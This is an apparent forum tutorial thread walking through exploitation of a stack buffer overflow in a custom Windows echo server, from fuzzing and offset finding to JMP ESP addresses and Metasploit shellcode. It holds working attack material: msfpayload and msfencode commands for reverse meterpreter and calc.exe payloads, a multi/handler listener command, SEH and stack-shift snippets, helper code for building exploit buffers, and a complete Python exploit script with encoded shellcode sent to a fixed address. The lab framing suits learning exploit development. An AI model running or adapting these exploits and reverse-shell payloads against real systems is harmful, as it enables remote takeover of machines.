
Exploitation 1

Hello guys! I wanted to write a little guide on exploitation to complement what is taught in class, so I assume you know the basics already. I hope you find it useful.

Target download: server.exe

Knowing our target

OK, so we have this program called "server.exe" which we have been told to audit. The only thing we know about it is that it is a custom application running on one of our client's servers, so let's run it ourselves and see what it does.

Interesting, so let's connect to it using netcat.

So it looks like we have a custom echo server. Now, why would anyone really need this? No one knows, but this information should be enough to start our actual audit.

Testing for overflows

Now we are going to drop our application into Olly and leave it listening, and we are going to write a Python script that will eventually become our exploit, but let's not get too far ahead of ourselves :) First we need to check whether there is a vulnerability at all, so our initial script is really simple: we build a buffer of 200 A's (it could be any letter, it doesn't matter) and feed that buffer to our target application to try and make it break. Since Olly is attached to it, we will be able to see some interesting information when it does. Now let's do this!

Oooops! Looks like we didn't hit it hard enough! So let's give it what it wants: we are now going to use a bigger buffer, A * 500.

Now it will crash, and we check Olly:

[screenshot: over.jpg]

This means it tried to read 41414141 (AAAA in hex) as the next instruction to execute (EIP), so there is a very good chance we can control the execution flow and do whatever we want in the context of the user the application is running under (meaning that if it runs with admin privileges we pretty much own the box; otherwise we can still get a shell back, but with lower privileges).

Finding the offset

Next step: now we need to find the offset, that is, the number of bytes we need to send to reach and overwrite the return address. The best way to do this is with a pair of Metasploit tools, pattern_create.rb and pattern_offset.rb, which ship with the framework in BackTrack.

We run pattern_create.rb asking for 500 bytes. What we get back is a 500-byte string that we will now feed into our target instead of the 500 A's, so we change our buffer variable to hold that pattern.

Now we restart the server (Ctrl+2 to restart and F9 to run it in Olly) and launch our script again. It will crash; let's look at Olly:

[screenshot: over2k.jpg]

We take the value now in EIP, give it to pattern_offset.rb and it gives us our offset. Easy enough? :)

Now let's test this: we empty our buffer variable and this time we use A's again, but instead of a random number we use our offset. Our buffer variable now becomes our offset worth of A's, followed by four B's and then a block of C's.

Notice we now have B and C: these are the placeholders for our return address and shellcode, respectively. If all goes right we should now be able to crash the target again and the value of EIP should be 42424242 (BBBB in hex).
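As an added illustration of the offset-finding step (this is example code, not from the original post and not Metasploit's own scripts), here is a pure-Python reimplementation of what pattern_create.rb and pattern_offset.rb do, followed by the A/B/C verification buffer the post describes. The EIP value 0x37634136 used at the bottom is a constructed sample, not a value taken from the server.exe crash, and the function names are my own.

```python
# Added example (not from the original post): a pure-Python version of what
# Metasploit's pattern_create.rb / pattern_offset.rb do, so the offset-finding
# step can be followed without the tools installed.
import string
import struct


def pattern_create(length):
    """Return `length` bytes of the Metasploit cyclic pattern (Aa0Aa1Aa2...).

    Each 3-character group (upper, lower, digit) is unique within the first
    26*26*10*3 = 20280 bytes, so a 4-byte window pins down one position.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                for ch in (upper, lower, digit):
                    if len(out) >= length:
                        return bytes(out)
                    out.append(ord(ch))
    return bytes(out)


def pattern_offset(eip_value, length=500):
    """Map the value found in EIP back to its offset inside the pattern.

    `eip_value` is the register value as printed by the debugger (an int such
    as 0x37634136); x86 is little-endian, so the bytes sitting in memory are
    the reverse of the printed value.  Returns -1 if the value is not found.
    """
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def build_probe(offset, tail_len=200):
    """Rebuild the verification buffer from the post: `offset` A's, four B's
    for the return-address slot and C's where the shellcode will later go."""
    return b"A" * offset + b"BBBB" + b"C" * tail_len


def check_probe(buf, offset):
    """True if the 4 bytes that would land in EIP are BBBB (0x42424242)."""
    return struct.unpack("<I", buf[offset:offset + 4])[0] == 0x42424242


if __name__ == "__main__":
    # Constructed sample: a debugger showing EIP=37634136 after the crash.
    eip = 0x37634136
    off = pattern_offset(eip)
    print("EIP 0x%08x -> offset %d" % (eip, off))
    probe = build_probe(off)
    print("EIP slot holds BBBB:", check_probe(probe, off))
```

Run it as a script to see the offset for the sample value; in practice you would paste the EIP value from the debugger into `pattern_offset()` and then send `build_probe(offset)` to confirm the 42424242 crash before going any further.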

Getting a return address

What we need now is a return address that will make the execution flow jump into our shellcode. If you watch Olly at the last crash and 'Follow in Dump' the ESP register, you will see that is exactly where our C's start; remember this is our placeholder for the shellcode. But to get there we first need an address that holds a JMP ESP instruction or equivalent (CALL ESP, or a POP/RET sequence). To find such an address we can load kernel32.dll (user32.dll also works most of the time and tends to have more addresses available) into Olly or IDA and look for the instruction by hand, or, even better, use a proper tool for the task. There are two good tools for this. One is included with the Metasploit framework and is called 'msfpescan'; it scans a DLL for a JMP ESP instruction and prints the addresses it finds.

The other tool is findjmp2, which you can download here.

You should be able to use any address as long as it doesn't contain any null characters (00), because that would break our exploit: remember a null character terminates a string.

Now we are going to test this: we replace the four B's in our buffer with the address we found.

Let's go to Olly, go to that memory location (Ctrl+G) and set a breakpoint there (F2). Restart the server and launch our script; we should land on the JMP ESP instruction.

[screenshot: over3.jpg]

And if we step in, we should see our C's. Now we are ready to change these for something useful!

Creating some shellcode

We are getting close; now we just need to replace our shellcode placeholder with a real one. I assume you already know what shellcode is, but a small recap: basically it is a piece of machine code that will return us a shell or do anything else we want, like adding a user on the system. You can make these by hand, but I won't cover that here, so no problem, Metasploit to the rescue again! We are going to use the msfpayload and msfencode tools.

Please note you will need to adjust the IP address to the one of your BackTrack machine. We are telling msfpayload to create a reverse meterpreter shellcode for us with our listener's address as a parameter, and then we pipe it through msfencode, which encodes our shellcode mainly for two reasons: the most important is getting rid of characters that would break our shellcode (the -b option), and the other is getting past some IDS.
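Added example, not part of the original post: a small pre-flight check for the two failure causes the post warns about, a return address or shellcode containing bad characters. It reuses the offset (260) and the user32.dll address from the exploit script at the end of the page; the bad-byte set {00, 0a, 0d} is the one passed to msfencode -b in the calc.exe command further down. The INT3 dummy "shellcode" and all function names are constructed for this example.

```python
# Added example (not from the original post): validate the exploit buffer's
# pieces against a bad-character set before anything is sent, which is the
# usual cause of "everything works until I use real shellcode".
import struct

# The three bytes excluded with msfencode -b '\x00\x0a\x0d': NUL, LF and CR.
DEFAULT_BAD = frozenset([0x00, 0x0a, 0x0d])


def find_bad_chars(data, bad=DEFAULT_BAD):
    """Return [(index, byte), ...] for every byte of `data` found in `bad`."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def pack_return_address(addr, bad=DEFAULT_BAD):
    """Little-endian encode a 32-bit address and refuse it if it contains a
    bad byte (a NUL would terminate the string before the shellcode)."""
    raw = struct.pack("<I", addr)
    hits = find_bad_chars(raw, bad)
    if hits:
        raise ValueError("address 0x%08x contains bad bytes at %r" % (addr, hits))
    return raw


def build_buffer(offset, ret_addr, shellcode, nop_count=16, bad=DEFAULT_BAD):
    """Assemble [A * offset][return address][NOP sled][shellcode], validating
    both the address and the shellcode against the bad-byte set."""
    hits = find_bad_chars(shellcode, bad)
    if hits:
        raise ValueError("shellcode contains bad bytes at %r" % hits)
    return (b"A" * offset
            + pack_return_address(ret_addr, bad)
            + b"\x90" * nop_count
            + shellcode)


if __name__ == "__main__":
    # Values from the exploit script on this page: offset 260 and the
    # user32.dll JMP ESP at 0x7c874413.  The "shellcode" is a constructed
    # dummy of INT3 breakpoints, which is handy for stepping in a debugger.
    dummy = b"\xcc" * 8
    buf = build_buffer(260, 0x7c874413, dummy)
    print("buffer length:", len(buf))
    print("bad bytes in a LF-containing blob:", find_bad_chars(b"\x90\x0a\x90"))
```

The check is cheap and catches the problem before the debugger session: if msfencode was given the wrong -b list, `build_buffer()` raises and names the offending offsets instead of silently sending a truncated payload.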

Exploit time!

At this point our final exploit should look something like the full script posted at the end of this page: the offset worth of A's, the return address, a NOP sled and the shellcode.

Start a payload handler by issuing this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And if everything went right you should get a session. Finally, the two main problems you will run into while working on an exploit: a bad return address (remember every SP and language will have different system libs (user32, kernel32...), so make sure you get an address for the right Windows version and language), and bad chars in the shellcode. I really wanted to bash my head against a wall so many times with this one, so if everything works right up to the point of using real shellcode, this is the most likely cause.

umm, there should be enough space for a meterpreter. Anyway, you might want to try with a simpler payload first, like executing calc.exe. If you follow along the execution with OllyDbg and the only problem is the shellcode, it might be an encoding issue, also space, but if I remember right this is not the case.

calc.exe shellcode:

msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -t c

@@@@@@@@

t3rmlt, I have tested your exploit and I noticed that after the jmp esp you don't land on the NOPs+shellcode. Then, paying closer attention to your code, I noticed you missed the x on the nops:

buf += '\90' * 16

and the right one is

buf += '\x90' * 16

After this change your exploit works :)

This is how it should look when you jump to esp...

##########
I recently started to dive into memory exploitation and worked through Stack BoF, SEH Stack BoF, Heap Spraying and Egg Hunter examples. If there is any interest I will throw the general exploitation process here, but I would have to gather some screenshots and images.



A few handy things I came across (source: corelan.be / youtube):


- Stack BoF Exploit Reliability -

Add a "Prepend" or "Stack Shift". Often used on Windows exploits to make room on the stack for the decoder to properly decode the payload / shellcode. It also prevents the exploit from being corrupted by whatever data is on the stack.

Example:

prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h (4097)
prepend += "\x44" # inc esp

In case you're wondering why they use -1001 and then increase esp again to -1000: the opcode for add esp,-1000 contains a null byte.

The exploit will look like: [enough junk to overwrite EIP][call esp addr][$prepend][iNT3][shellcode]

Create the right instruction by using metasm in Metasploit. Example:
metasm > add esp,-450
"\x81\xc4\x3e\xfe\xff\xff"


- What to do if space for a payload is limited? -

    Use a "staged" Metasploit payload, as they require less space
    Use a different (or no) encoding of the payload
    Use an egg hunter (summary: the payload can be located anywhere in memory; we put a tag in front of it and on exploitation we search memory for it). Drawback: 100% CPU utilization, try to use it as a last resort
    Use a negative jump: this only works if we have enough space at the beginning, for example in a SEH BoF

Example:
We overwrite 4403 bytes before we reach the SEH handler. This space can be used to place our payload, but we must jump back to it. Some pseudo-code:

import struct

distance_to_seh = [value]  # e.g. 4403

eip = [poppopret]  # an instruction from a target lib is preferred over an OS lib

shellcode = [array of shellcode]  # our payload

pad = "\x90" * (distance_to_seh - len(shellcode))  # adds a NOP sled before the payload

jmp_min = "\xE9\x98\xEF\xFF\xFF"  # goes back 4000 bytes to land in the NOP sled

buf = pad + shellcode + struct.pack('<I', eip) + jmp_min  # ready to exploit

That's all folks... Keep on learning  ^_^
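Added example, not part of the forum post above and not metasm: encoders for the two instructions that post relies on, add esp,imm32 and jmp rel32, so the "-1001h then inc esp" remark and the 5-byte negative jump can be checked without assembling anything. It assumes a 32-bit x86 target as the post does; the function names are mine. Decoding the post's jmp_min bytes this way gives a displacement of -4200, measured from the end of the 5-byte instruction.

```python
# Added example (not from the forum post): minimal x86 encoders for
# `add esp, imm32` and `jmp rel32`, with the NUL-byte check that explains
# why the post shifts the stack by -1001h and then does `inc esp`.
import struct

INC_ESP = b"\x44"  # one-byte `inc esp`


def add_esp(imm32):
    """Encode `add esp, imm32` (opcode 81 /0 id; ModRM C4 selects esp)."""
    return b"\x81\xc4" + struct.pack("<i", imm32)


def has_nul(code):
    """True if the encoding contains a 0x00 byte (a string terminator)."""
    return b"\x00" in code


def stack_shift(delta):
    """Return a NUL-free instruction sequence that moves ESP by `delta`.

    If the plain encoding contains a NUL (as add esp,-1000h does, since
    -0x1000 is 00 F0 FF FF little-endian), emit add esp,(delta-1) followed
    by inc esp, which is exactly the trick shown in the post.
    """
    plain = add_esp(delta)
    if not has_nul(plain):
        return plain
    alt = add_esp(delta - 1) + INC_ESP
    if has_nul(alt):
        raise ValueError("no NUL-free encoding found for %d" % delta)
    return alt


def jmp_rel32(displacement):
    """Encode `jmp rel32` (E9 + signed 32-bit displacement)."""
    return b"\xe9" + struct.pack("<i", displacement)


def jmp_target(instruction_addr, code):
    """Where a `jmp rel32` located at `instruction_addr` lands: the
    displacement is relative to the end of the 5-byte instruction."""
    disp = struct.unpack("<i", code[1:5])[0]
    return instruction_addr + 5 + disp


if __name__ == "__main__":
    print(add_esp(-450).hex())         # same bytes metasm printed in the post
    print(stack_shift(-0x1000).hex())  # 81c4ffefffff44 = add esp,-1001h ; inc esp
    # The post's jmp_min ("\xE9\x98\xEF\xFF\xFF") decodes to a displacement of:
    print(struct.unpack("<i", b"\x98\xef\xff\xff")[0])
```

`stack_shift()` generalises the post's trick to any shift value: it only falls back to the two-instruction form when the single `add` would contain a NUL byte, so the output stays as short as possible.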
#############
#! /usr/bin/env python
# Python 2 script as posted in the thread. The NOP sled line still carries the
# bug pointed out in the reply above ('\90' instead of '\x90').
import socket
import sys

buf = 'A' * 260                 # padding up to the saved return address (offset 260)
buf += '\x13\x44\x87\x7c'       # user32.dll JMP ESP, Windows XP SP3 (0x7c874413, little-endian)
buf += '\90' * 16               # intended as a 16-byte NOP sled; missing the 'x' in '\x90'
buf += (
"\xdb\xc5\xbe\x1b\xbf\x27\x38\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x33\x31\x77\x17\x83\xef\xfc\x03\x6c\xac\xc5\xcd\x6e\x3a\x80"
"\x2e\x8e\xbb\xf3\xa7\x6b\x8a\x21\xd3\xf8\xbf\xf5\x97\xac\x33"
"\x7d\xf5\x44\xc7\xf3\xd2\x6b\x60\xb9\x04\x42\x71\x0f\x89\x08"
"\xb1\x11\x75\x52\xe6\xf1\x44\x9d\xfb\xf0\x81\xc3\xf4\xa1\x5a"
"\x88\xa7\x55\xee\xcc\x7b\x57\x20\x5b\xc3\x2f\x45\x9b\xb0\x85"
"\x44\xcb\x69\x91\x0f\xf3\x02\xfd\xaf\x02\xc6\x1d\x93\x4d\x63"
"\xd5\x67\x4c\xa5\x27\x87\x7f\x89\xe4\xb6\xb0\x04\xf4\xff\x76"
"\xf7\x83\x0b\x85\x8a\x93\xcf\xf4\x50\x11\xd2\x5e\x12\x81\x36"
"\x5f\xf7\x54\xbc\x53\xbc\x13\x9a\x77\x43\xf7\x90\x83\xc8\xf6"
"\x76\x02\x8a\xdc\x52\x4f\x48\x7c\xc2\x35\x3f\x81\x14\x91\xe0"
"\x27\x5e\x33\xf4\x5e\x3d\x59\x0b\xd2\x3b\x24\x0b\xec\x43\x06"
"\x64\xdd\xc8\xc9\xf3\xe2\x1a\xae\x0c\xa9\x07\x86\x84\x74\xd2"
"\x9b\xc8\x86\x08\xdf\xf4\x04\xb9\x9f\x02\x14\xc8\x9a\x4f\x92"
"\x20\xd6\xc0\x77\x47\x45\xe0\x5d\x24\x08\x72\x3d\x85\xaf\xf2"
"\xa4\xd9"
)

try:
    sc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP socket
    sc.connect(("10.1.1.15", 1979))
    sc.send(buf + "\n")
    print "[+] Evil buffer sent"
    sc.close()

except socket.error:
    print "[-] Can't send evil buffer"
    sys.exit()

############
